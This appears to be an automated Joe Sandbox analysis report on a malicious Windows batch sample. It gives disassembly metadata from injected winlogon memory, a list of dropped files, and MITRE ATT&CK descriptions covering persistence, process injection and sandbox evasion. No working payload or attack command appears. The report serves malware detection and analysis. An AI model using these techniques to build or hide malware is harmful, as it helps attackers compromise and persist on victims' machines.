Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 9161A333908BC882E7729F15E440BDAB7A0FB85B98F444215EB9C47B99CB79D191CB42

Function 000001CA7D2125DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D2126C2
StrCpyW.SHLWAPI ref: 000001CA7D2126D9

Strings

\\.\pipe\, xrefs: 000001CA7D2126CD

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 1df65754e96209d10ce77b496f8102a845f38ec8baad36118dacfef27c9bbe4a
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: B8511537A84389C1FA268E25A455BEB7751FF84788F948229ED4903B89DA37C403C7C3

Function 000001CA7D1E25DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CA7D1E26C2
StrCpyW.SHLWAPI ref: 000001CA7D1E26D9

Strings

\\.\pipe\, xrefs: 000001CA7D1E26CD

Memory Dump Source

Source File: 00000026.00000002.2551471326.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true

Associated: 00000026.00000002.2550625621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2552462016.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2553296974.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2554151398.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2555098305.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d1e0000_winlogon.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3

Function 000001CA7D222660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001CA7D222778
GetLastError.KERNEL32 ref: 000001CA7D22279D

Strings

U, xrefs: 000001CA7D222722

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction ID: d46591c1412a96a10cecd863ef609a76f42ec2867853ab4bfb7008d3bc80fece
Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
Instruction Fuzzy Hash: 7341C633A1578886F7218F25E444BDAB7A4FB58788F854121FA4D87754EB3AD402C7C6

Function 000001CA7D219178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001CA7D2191C8
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000001CA7D2187F7), ref: 000001CA7D219209

Strings

csm, xrefs: 000001CA7D2191F6

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction ID: 517ae6d43ddc074c8658f2a788c9059df09fd0698180bc9205b6b9a099bd701b
Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
Instruction Fuzzy Hash: 34116033614B4482EB228F15F40469977E5FB88B98FA88224EE8D07754DF3EC552CB81

Function 000001CA7D211D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D211D69
HeapAlloc.KERNEL32 ref: 000001CA7D211D77
GetProcessHeap.KERNEL32 ref: 000001CA7D211D9C
HeapFree.KERNEL32 ref: 000001CA7D211DAA

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction ID: 94fdc9e09a08f213f1bc6ccc5a98238e785e2224b4f0dd50957134c3d91f74e5
Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
Instruction Fuzzy Hash: A011A132F01B8881FA16CB66A40959977A0FBC9FD4F998128DE4E53724DF3AD4438386

Function 000001CA7D211264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D21126A
HeapAlloc.KERNEL32 ref: 000001CA7D211279
GetProcessHeap.KERNEL32 ref: 000001CA7D211293
HeapAlloc.KERNEL32 ref: 000001CA7D2112A4

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction ID: 839ec4f0ffbd96bf49ac46d9521be995a92d04ba0fb748254b619ef769a1f32e
Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
Instruction Fuzzy Hash: 0CE03932A416089AF7158B62D80979936E1FB88B19FC6C024C90907350EF7ED49A87C2

Function 000001CA7D211000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CA7D211006
HeapAlloc.KERNEL32 ref: 000001CA7D211015
GetProcessHeap.KERNEL32 ref: 000001CA7D211028
HeapAlloc.KERNEL32 ref: 000001CA7D211037

Memory Dump Source

Source File: 00000026.00000002.2556665994.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true

Associated: 00000026.00000002.2555892142.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2557614010.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558252368.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2558993815.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000026.00000002.2559657526.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_1ca7d210000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction ID: 4bb58136d852c2a653d8a036cd639210b1baa135ea19a913abf8e9fecaf76bee
Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
Instruction Fuzzy Hash: BCE06D72A516089AF7198B22D80969832A1FF88B19FC5C020C90907310EE3D949A9692

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Q5N7WOpk8J.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sm0liga.nc4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xkid3nn.3jg.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiob2gei.nay.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxaazhmj.shy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npqarj1o.z2h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rg5ajs0f.ihs.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnrngxsf.4jk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xta1tbik.5hd.psm1

C:\Users\user\AppData\Roaming\$nya-Logs\2024-09-26

C:\Windows\$cnt-onimai2\$cnt-CO2.bat

C:\Windows\$cnt-onimai2\$cnt-CO2.bat:Zone.Identifier

C:\Windows\System32\Tasks\$cnt-sYvLLQ2I

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Windows\Temp\__PSScriptPolicyTest_czh1ayd4.gmu.ps1

C:\Windows\Temp\__PSScriptPolicyTest_ehhlhx4m.orb.psm1

\Device\ConDrv

Windows Analysis Report
Q5N7WOpk8J.bat

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre